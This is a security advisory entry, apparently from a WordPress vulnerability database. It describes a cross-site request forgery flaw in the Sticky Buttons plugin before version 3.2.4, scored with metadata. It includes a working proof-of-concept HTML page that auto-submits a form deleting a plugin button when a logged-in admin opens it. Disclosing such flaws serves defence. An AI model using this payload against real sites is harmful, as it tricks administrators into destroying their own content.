Lucene search

K
wpexploitBob MatyasWPEX-ID:BF540242-5306-4C94-AD50-782D0D5B127F
HistoryApr 11, 2024 - 12:00 a.m.

Sticky Buttons < 3.2.4 - Button Deletion via CSRF

2024-04-1100:00:00
Bob Matyas
35
button deletion
cross-site request forgery
security update.

AI Score

6.8

Confidence

Low

EPSS

0

Percentile

9.0%

Description The plugin does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting buttons via CSRF attacks

Make a logged in admin open an HTML file where `ID` is a valid ID:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=sticky-buttons" method="POST">
        <input type="text" name="ID" value="1" />
        <input type="text" name="action" value="delete-items" />
        <input type="text" name="action2" value="delete-items" />
        action
        <input type="submit" value="submit">
    </form>
</body>
```

AI Score

6.8

Confidence

Low

EPSS

0

Percentile

9.0%

Related for WPEX-ID:BF540242-5306-4C94-AD50-782D0D5B127F